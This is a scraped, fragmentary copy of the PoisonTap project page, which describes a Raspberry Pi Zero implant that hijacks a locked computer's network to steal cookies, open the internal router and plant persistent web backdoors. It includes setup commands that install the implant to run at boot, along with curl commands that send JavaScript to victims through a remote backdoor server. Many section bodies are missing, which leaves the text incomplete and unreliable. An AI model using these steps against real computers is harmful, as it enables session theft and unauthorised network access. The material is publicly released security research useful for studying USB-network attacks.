Home

Awesome

PoisonTap - siphons cookies, exposes internal router & installs web backdoor on locked computers

Created by <a href="https://twitter.com/samykamkar" target=_blank>@SamyKamkar</a> || <a href="https://samy.pl" target=_blank>https://samy.pl</a>

When PoisonTap (<a href="http://amzn.to/2eMr2WY" target="_blank">Raspberry Pi Zero</a> & Node.js) is plugged into a locked/password protected computer, it:

PoisonTap

(incredible HTML5 canvas animation by <a href="https://codepen.io/ara_node/" target="_blank">Ara</a>)

PoisonTap evades the following security mechanisms:


Demo

PoisonTap is built for the $5 <a href="http://amzn.to/2eMr2WY" target="_blank">Raspberry Pi Zero</a> without any additional components other than a <a href="https://amzn.to/2fUMdah" target="_blank">micro-USB cable</a> & <a href="https://amzn.to/2fWgKsd" target="_blank">microSD card</a>, or can work on any Raspberry Pi (1/2/3) with an Ethernet-to-USB/Thunderbolt dongle, or can work on other devices that can emulate USB gadgets such as <a href="https://inversepath.com/usbarmory" target="_blank">USB Armory</a> and <a href="https://lanturtle.com/" target=_blank>LAN Turtle</a>.

Live demonstration and more details available in the video: <a href="https://www.youtube.com/watch?v=Aatp5gCskvk" target="_blank"><img src= "https://samy.pl/poisontap/ptap-thumbnail-small.png" alt="MagSpoof" border="1" /></a>

Point of Contact: <a href="https://twitter.com/samykamkar" target=_blank>@SamyKamkar</a> // <a href="https://samy.pl" target=_blank>https://samy.pl</a>

Released: November 16, 2016

Source code and download: <a href="https://github.com/samyk/poisontap" target=_blank>https://github.com/samyk/poisontap</a>


How PoisonTap Works

PoisonTap produces a cascading effect by exploiting the existing trust in various mechanisms of a machine and network, including USB/Thunderbolt, DHCP, DNS, and HTTP, to produce a snowball effect of information exfiltration, network access and installation of semi-permanent backdoors.

Network Hijacking

In a nutshell, PoisonTap performs the following:

Network Hijacking

Cookie Siphoning

Cookie Siphoning

Internal Router Backdoor

Remotely Accessible Web-Based Backdoors

<a href="http://amzn.to/2eMr2WY" target="_blank">Raspberry Pi Zero</a>

Internal Router Backdoor & Remote Access

<img src="https://samy.pl/poisontap/pin2.png?1" alt="DNS Rebinding" />

Recap of the DNS server:

Additional Remotely Accessible Web-Based Backdoors


PoisonTap

Securing Against PoisonTap

Server-Side Security

If you are running a web server, securing against PoisonTap is simple:

Desktop Security


Download

Source code: <a href="https://github.com/samyk/poisontap" target=_blank>https://github.com/samyk/poisontap</a>


Installation / File Breakdown

Note: If you find the device is NOT acting as an Ethernet controller automatically (older versions of Windows, for example), you can change the VID and PID in pi_startup.sh

# Instructions adjusted from https://gist.github.com/gbaman/50b6cca61dd1c3f88f41
sudo bash

# If Raspbian BEFORE 2016-05-10, then run next line:
BRANCH=next rpi-update

echo -e "\nauto usb0\nallow-hotplug usb0\niface usb0 inet static\n\taddress 1.0.0.1\n\tnetmask 0.0.0.0" >> /etc/network/interfaces
echo "dtoverlay=dwc2" >> /boot/config.txt
echo -e "dwc2\ng_ether" >> /etc/modules
sudo sed --in-place "/exit 0/d" /etc/rc.local
echo "/bin/sh /home/pi/poisontap/pi_startup.sh" >> /etc/rc.local
mkdir /home/pi/poisontap
chown -R pi /home/pi/poisontap
apt-get update && apt-get upgrade
apt-get -y install isc-dhcp-server dsniff screen nodejs

Place dhcpd.conf in /etc/dhcp/dhcpd.conf and the rest of the files in /home/pi/poisontap, then reboot to ensure everything is working.

There are a number of <a href="https://github.com/samyk/poisontap" target=_blank>files in the repo</a>, which are used on different sides. The list:

# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'

Frequently Asked Questions


Contact

Point of Contact: <a href="https://twitter.com/samykamkar" target=_blank>@SamyKamkar</a>

You can see more of my projects or contact me at <a href="https://samy.pl" target=_blank>https://samy.pl</a>.